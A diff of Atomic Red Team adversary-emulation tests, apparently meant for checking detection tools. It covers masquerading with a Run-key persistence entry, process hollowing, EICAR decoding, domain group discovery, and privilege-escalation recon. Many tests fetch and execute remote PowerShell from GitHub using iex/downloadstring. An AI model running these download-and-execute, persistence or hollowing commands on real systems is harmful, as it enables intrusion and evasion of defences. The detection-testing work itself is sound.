+              - notepad.exe launched with a ransom-themed text file
+              - creation of a ransom-themed text file in %TEMP%
+            NON-DESTRUCTIVE Atomic Red Team test.
+      dependency_executor_name: command_prompt
+      dependencies:
+      - description: Notepad must be present on the system
+        prereq_command: where notepad
+        get_prereq_command: ''
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $notePath = Join-Path $env:TEMP "#{note_filename}"
+          $pidPath  = Join-Path $env:TEMP "#{pid_filename}"
+
+          $Title = "#{note_title}"
+          $Body  = "#{note_body}"
+
+          $header  = $Title + "`r`n" + ('=' * $Title.Length) + "`r`n`r`n"
+          $content = $header + $Body
+
+          [System.IO.File]::WriteAllText($notePath, $content, [System.Text.Encoding]::UTF8)
+
+          $p = Start-Process notepad.exe -ArgumentList "`"$notePath`"" -PassThru
+          $p.Id | Out-File -FilePath $pidPath -Encoding ascii -Force
+        cleanup_command: |
+          try {
+            # 1. Kill all Notepad processes
+            Get-Process notepad -ErrorAction SilentlyContinue |
+              ForEach-Object {
+                Stop-Process -Id $_.Id -Force -ErrorAction SilentlyContinue
+              }
+
+            # 2. Wait briefly for Windows to release file handles
+            Start-Sleep -Seconds 1
+
+            # 3. Force delete ransom note + PID file
+            $notePath = Join-Path $env:TEMP "ART-T1491-ransom-note.txt"
+            $pidPath  = Join-Path $env:TEMP "ART-T1491-notepad.pid"
+
+            if (Test-Path $notePath) {
+              Remove-Item $notePath -Force -ErrorAction Stop
+            }
+            if (Test-Path $pidPath) {
+              Remove-Item $pidPath -Force -ErrorAction Stop
+            }
+          }
+          catch {
+            Write-Warning "Cleanup failed with error: $_"
+          }
  T1496.004:
    technique:
      type: attack-pattern
@@ -191,9 +191,10 @@ atomic_tests:
  - macos
  executor:
    command: |
-      defaults read /usr/libexec/ApplicationFirewall/com.apple.alf || defaults read /Library/Preferences/com.apple.alf
-      /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
-    name: sh
+      sudo defaults read /Library/Preferences/com.apple.alf
+      sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
+    name: bash
+    elevation_required: true
 - name: DNS Server Discovery Using nslookup
  auto_generated_guid: 34557863-344a-468f-808b-a1bfb89b4fa9
  description: |
@@ -0,0 +1,99 @@
+# T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/013)
+<blockquote>
+
+Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.
+
+This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.
+
+The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.
+
+For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) 
+
+Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.
+
+</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Decode Eicar File and Write to File](#atomic-test-1---decode-eicar-file-and-write-to-file)
+
+- [Atomic Test #2 - Decrypt Eicar File and Write to File](#atomic-test-2---decrypt-eicar-file-and-write-to-file)
+
+
+<br/>
+
+## Atomic Test #1 - Decode Eicar File and Write to File
+Decode the eicar value, and write it to file, for AV/EDR to try to catch.
+
+**Supported Platforms:** Windows, macOS, Linux
+
+
+**auto_generated_guid:** 7693ccaa-8d64-4043-92a5-a2eb70359535
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
+$bytes = [System.Convert]::FromBase64String($encodedString)
+$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
+
+#write the decoded eicar string to file
+$decodedString | Out-File T1027.013_decodedEicar.txt
+```
+
+#### Cleanup Commands:
+```powershell
+Just delete the resulting T1027.013_decodedEicar.txt file.
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Decrypt Eicar File and Write to File
+Decrypt the eicar value, and write it to file, for AV/EDR to try to catch.
+
+**Supported Platforms:** Windows, macOS, Linux
+
+
+**auto_generated_guid:** b404caaa-12ce-43c7-9214-62a531c044f7
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
+$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
+
+$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
+$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
+
+#Write the decrypted eicar string to a file
+$decryptedString | out-file T1027.013_decryptedEicar.txt
+```
+
+#### Cleanup Commands:
+```powershell
+Just delete the resulting T1027.013_decryptedEicar.txt file.
+```
+
+
+
+
+
+<br/>
@@ -0,0 +1,41 @@
+attack_technique: T1027.013
+display_name: 'Obfuscated Files or Information: Encrypted/Encoded File'
+atomic_tests:
+- name: Decode Eicar File and Write to File
+  auto_generated_guid: 7693ccaa-8d64-4043-92a5-a2eb70359535
+  description: Decode the eicar value, and write it to file, for AV/EDR to try to catch.
+  supported_platforms:
+    - windows
+    - macos
+    - linux
+  executor:
+    command: |-
+      $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
+      $bytes = [System.Convert]::FromBase64String($encodedString)
+      $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
+
+      #write the decoded eicar string to file
+      $decodedString | Out-File T1027.013_decodedEicar.txt
+    cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
+    name: powershell
+    elevation_required: false
+- name: Decrypt Eicar File and Write to File
+  auto_generated_guid: b404caaa-12ce-43c7-9214-62a531c044f7
+  description: Decrypt the eicar value, and write it to file, for AV/EDR to try to catch.
+  supported_platforms:
+    - windows
+    - macos
+    - linux
+  executor:
+    command: |-
+      $encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
+      $key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
+
+      $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
+      $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
+
+      #Write the decrypted eicar string to a file
+      $decryptedString | out-file T1027.013_decryptedEicar.txt
+    cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
+    name: powershell
+    elevation_required: false
@@ -10,14 +10,16 @@ This may be done by placing an executable in a commonly trusted directory (ex: u

 ## Atomic Tests

- [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)
+- [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)

 - [Atomic Test #2 - Masquerade as a built-in system executable](#atomic-test-2---masquerade-as-a-built-in-system-executable)

+- [Atomic Test #3 - Masquerading cmd.exe as VEDetector.exe](#atomic-test-3---masquerading-cmdexe-as-vedetectorexe)
+

 <br/>

-## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.
+## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory
 Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)

 **Supported Platforms:** macOS, Linux
@@ -99,4 +101,84 @@ Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore



+<br/>
+<br/>
+
+## Atomic Test #3 - Masquerading cmd.exe as VEDetector.exe
+This test simulates an adversary renaming cmd.exe to VEDetector.exe to masquerade as a legitimate application.
+The test copies cmd.exe, renames it to VEDetector.exe, adds a registry run key for persistence, and executes the renamed binary.
+This technique may be used to evade detection by mimicking legitimate software names or locations.
+
+**Expected Output:**
+- A new process named VEDetector.exe appears in the process list, but its behavior matches cmd.exe.
+- SIEM/EDR systems may detect this as suspicious process activity (e.g., Sysmon Event ID 1 for process creation, or Event ID 13 for registry modifications).
+- Registry modification in HKLM:\Software\Microsoft\Windows\CurrentVersion\Run may trigger persistence alerts in XDR platforms.
+
+**References:**
+- [MITRE ATT&CK T1036.005](https://attack.mitre.org/techniques/T1036/005/)
+- [Sysmon Process Creation](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 03ae82a6-9fa0-465b-91df-124d8ca5c4e8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ved_path | Directory path where VEDetector.exe will be created | Path | $env:TEMP|
+| source_file | Path to the source cmd.exe file | Path | $env:SystemRoot&#92;System32&#92;cmd.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+# Copy and rename cmd.exe to VEDetector.exe
+Copy-Item -Path "#{source_file}" -Destination "#{ved_path}\VEDetector.exe" -Force
+
+# Create registry run key for persistence
+New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "#{ved_path}\VEDetector.exe" -PropertyType String -Force
+
+# Start the renamed process
+Start-Process -FilePath "#{ved_path}\VEDetector.exe"
+
+Start-Sleep -Seconds 5
+```
+
+#### Cleanup Commands:
+```powershell
+# Remove registry key
+Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -ErrorAction SilentlyContinue
+
+# Stop the process
+Stop-Process -Name "VEDetector" -Force -ErrorAction SilentlyContinue
+
+# Remove the file
+Remove-Item -Path "#{ved_path}\VEDetector.exe" -Force -ErrorAction SilentlyContinue
+
+Write-Host "[+] Cleaned up VEDetector artifacts"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The source cmd.exe file must exist on the system.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{source_file}") { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "[-] Source file not found: #{source_file}. Ensure cmd.exe exists in the specified path."
+exit 1
+```
+
+
+
+
 <br/>
@@ -1,13 +1,15 @@
+---
 attack_technique: T1036.005
 display_name: 'Masquerading: Match Legitimate Name or Location'
+
 atomic_tests:
- name: Execute a process from a directory masquerading as the current parent directory.
+- name: Execute a process from a directory masquerading as the current parent directory
  auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
  description: |
    Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
  supported_platforms:
-  - macos
-  - linux
+    - macos
+    - linux
  input_arguments:
    test_message:
      description: Test message to echo out to the screen
@@ -23,12 +25,13 @@ atomic_tests:
    cleanup_command: |
      rm -f $HOME/.../sh
      rmdir $HOME/.../
+
 - name: Masquerade as a built-in system executable
  auto_generated_guid: 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
  description: |
    Launch an executable that attempts to masquerade as a legitimate executable.
  supported_platforms:
-  - windows
+    - windows
  input_arguments:
    executable_filepath:
      description: File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility.
@@ -48,3 +51,68 @@ atomic_tests:
    cleanup_command: |
      Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore
    name: powershell
+
+- name: Masquerading cmd.exe as VEDetector.exe
+  auto_generated_guid: 03ae82a6-9fa0-465b-91df-124d8ca5c4e8
+  description: |
+    This test simulates an adversary renaming cmd.exe to VEDetector.exe to masquerade as a legitimate application.
+    The test copies cmd.exe, renames it to VEDetector.exe, adds a registry run key for persistence, and executes the renamed binary.
+    This technique may be used to evade detection by mimicking legitimate software names or locations.
+
+    **Expected Output:**
+    - A new process named VEDetector.exe appears in the process list, but its behavior matches cmd.exe.
+    - SIEM/EDR systems may detect this as suspicious process activity (e.g., Sysmon Event ID 1 for process creation, or Event ID 13 for registry modifications).
+    - Registry modification in HKLM:\Software\Microsoft\Windows\CurrentVersion\Run may trigger persistence alerts in XDR platforms.
+
+    **References:**
+    - [MITRE ATT&CK T1036.005](https://attack.mitre.org/techniques/T1036/005/)
+    - [Sysmon Process Creation](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    ved_path:
+      description: Directory path where VEDetector.exe will be created
+      type: Path
+      default: $env:TEMP
+    source_file:
+      description: Path to the source cmd.exe file
+      type: Path
+      default: $env:SystemRoot\System32\cmd.exe
+
+  dependency_executor_name: powershell
+  dependencies:
+    - description: |
+        The source cmd.exe file must exist on the system.
+      prereq_command: |
+        if (Test-Path "#{source_file}") { exit 0 } else { exit 1 }
+      get_prereq_command: |
+        Write-Host "[-] Source file not found: #{source_file}. Ensure cmd.exe exists in the specified path."
+        exit 1
+
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      # Copy and rename cmd.exe to VEDetector.exe
+      Copy-Item -Path "#{source_file}" -Destination "#{ved_path}\VEDetector.exe" -Force
+      
+      # Create registry run key for persistence
+      New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "#{ved_path}\VEDetector.exe" -PropertyType String -Force
+      
+      # Start the renamed process
+      Start-Process -FilePath "#{ved_path}\VEDetector.exe"
+      
+      Start-Sleep -Seconds 5
+    cleanup_command: |
+      # Remove registry key
+      Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -ErrorAction SilentlyContinue
+      
+      # Stop the process
+      Stop-Process -Name "VEDetector" -Force -ErrorAction SilentlyContinue
+      
+      # Remove the file
+      Remove-Item -Path "#{ved_path}\VEDetector.exe" -Force -ErrorAction SilentlyContinue
+      
+      Write-Host "[+] Cleaned up VEDetector artifacts"
@@ -39,6 +39,8 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
+| script_download_url | Download url for Start-Hollow.ps1 | string | https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1|
+| script_path | Path to Start-Hollow.ps1 | path | PathToAtomicsFolder&#92;T1055.012&#92;src&#92;Start-Hollow.ps1|
 | hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:&#92;Windows&#92;System32&#92;cmd.exe|
 | parent_process_name | Name of the parent process | string | explorer|
 | sponsor_binary_path | Path of the sponsor binary (executable that will host the binary) | string | C:&#92;Windows&#92;System32&#92;notepad.exe|
@@ -49,7 +51,7 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/


 ```powershell
-. "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
+. "#{script_path}"
 $ppid=Get-Process #{parent_process_name} | select -expand id
 Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
 ```
@@ -61,6 +63,23 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore



+#### Dependencies:  Run with `powershell`!
+##### Description: Start-Hollow.ps1 must be installed
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{script_path}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+try {
+  iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
+} catch {
+  Write-Error $_
+  Exit 1
+}
+```
+
+


 <br/>
@@ -9,6 +9,14 @@ atomic_tests:
  supported_platforms:
  - windows
  input_arguments:
+    script_download_url:
+      description: Download url for Start-Hollow.ps1
+      type: string
+      default: https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/720d8fe82396faf74f2ca19a3fe99a5c262a14b9/Start-Hollow.ps1
+    script_path:
+      description: Path to Start-Hollow.ps1
+      type: path
+      default: PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1
    hollow_binary_path:
      description: Path of the binary to hollow (executable that will run inside the sponsor)
      type: string
@@ -27,12 +35,25 @@ atomic_tests:
      default: notepad
  executor:
    command: |
-      . "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
+      . "#{script_path}"
      $ppid=Get-Process #{parent_process_name} | select -expand id
      Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
    cleanup_command: |
      Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
    name: powershell
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Start-Hollow.ps1 must be installed
+    prereq_command: |
+      if (Test-Path "#{script_path}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      try {
+        iwr "#{script_download_url}" -OutFile (New-Item -Path #{script_path} -Force)
+      } catch {
+        Write-Error $_
+        Exit 1
+      }
 - name: RunPE via VBA
  auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
  description: |
@@ -112,4 +133,4 @@ atomic_tests:
      $PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe -program "#{hollow_binary_path}" -debug
    cleanup_command: |
       Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
-       Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
+       Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
@@ -127,10 +127,10 @@ test will display some errors if run on a computer not connected to a domain. Up


 ```cmd
-net groups "Account Operators" /doma
-net groups "Exchange Organization Management" /doma
-net group "BUILTIN\Backup Operators" /doma
-net group /domai "Domain Admins"
+net groups "Account Operators" /domain
+net groups "Exchange Organization Management" /domain
+net group "BUILTIN\Backup Operators" /domain
+net group "Domain Admins" /domain
 ```


@@ -40,10 +40,10 @@ atomic_tests:
  - windows
  executor:
    command: |
-      net groups "Account Operators" /doma
-      net groups "Exchange Organization Management" /doma
-      net group "BUILTIN\Backup Operators" /doma
-      net group /domai "Domain Admins"
+      net groups "Account Operators" /domain
+      net groups "Exchange Organization Management" /domain
+      net group "BUILTIN\Backup Operators" /domain
+      net group "Domain Admins" /domain
    name: command_prompt
 - name: Find machines where user has local admin access (PowerView)
  auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1
@@ -527,6 +527,7 @@ Discover Local Privilege Escalation possibilities using winPEAS function of WinP


 ```powershell
+$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 winPEAS -noninteractive -consoleoutput
 ```
@@ -556,6 +557,7 @@ Discover Local Privilege Escalation possibilities using itm4nprivesc function of


 ```powershell
+$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 itm4nprivesc -noninteractive -consoleoutput
 ```
@@ -585,6 +587,7 @@ Powersploits privesc checks using oldchecks function of WinPwn


 ```powershell
+$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 oldchecks -noninteractive -consoleoutput
 ```
@@ -622,6 +625,7 @@ General privesc checks using the otherchecks function of WinPwn


 ```powershell
+$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 otherchecks -noninteractive -consoleoutput
 ```
@@ -651,6 +655,7 @@ Collect general computer informations via GeneralRecon function of WinPwn


 ```powershell
+$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 Generalrecon -consoleoutput -noninteractive
 ```
@@ -680,6 +685,7 @@ Gathers local system information using the Morerecon function of WinPwn


 ```powershell
+$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 Morerecon -noninteractive -consoleoutput
 ```
@@ -709,6 +715,7 @@ Search for Resource-Based Constrained Delegation attack paths using RBCD-Check f


 ```powershell
+$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 RBCD-Check -consoleoutput -noninteractive
 ```
@@ -738,6 +745,7 @@ PowerSharpPack - Watson searching for missing windows patches  technique via fun


 ```powershell
+$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
 Invoke-watson
 ```
@@ -767,6 +775,7 @@ PowerSharpPack - Sharpup checking common Privesc vectors technique via function


 ```powershell
+$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
 Invoke-SharpUp -command "audit"
 ```
@@ -798,6 +807,7 @@ PowerSharpPack - Seatbelt technique via function of WinPwn.


 ```powershell
+$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
 Invoke-Seatbelt -Command "-group=all"
 ```
@@ -187,6 +187,7 @@ atomic_tests:
  - windows
  executor:
    command: |-
+      $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      winPEAS -noninteractive -consoleoutput
    name: powershell
@@ -197,6 +198,7 @@ atomic_tests:
  - windows
  executor:
    command: |-
+      $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      itm4nprivesc -noninteractive -consoleoutput
    name: powershell
@@ -207,6 +209,7 @@ atomic_tests:
  - windows
  executor:
    command: |-
+      $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      oldchecks -noninteractive -consoleoutput
    cleanup_command: |-
@@ -223,6 +226,7 @@ atomic_tests:
  - windows
  executor:
    command: |-
+      $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      otherchecks -noninteractive -consoleoutput
    name: powershell
@@ -233,6 +237,7 @@ atomic_tests:
  - windows
  executor:
    command: |-
+      $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      Generalrecon -consoleoutput -noninteractive
    name: powershell
@@ -243,6 +248,7 @@ atomic_tests:
  - windows
  executor:
    command: |-
+      $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      Morerecon -noninteractive -consoleoutput
    name: powershell
@@ -253,6 +259,7 @@ atomic_tests:
  - windows
  executor:
    command: |-
+      $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      RBCD-Check -consoleoutput -noninteractive
    name: powershell
@@ -264,6 +271,7 @@ atomic_tests:
  - windows
  executor:
    command: |-
+      $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
      Invoke-watson
    name: powershell
@@ -274,6 +282,7 @@ atomic_tests:
  - windows
  executor:
    command: |-
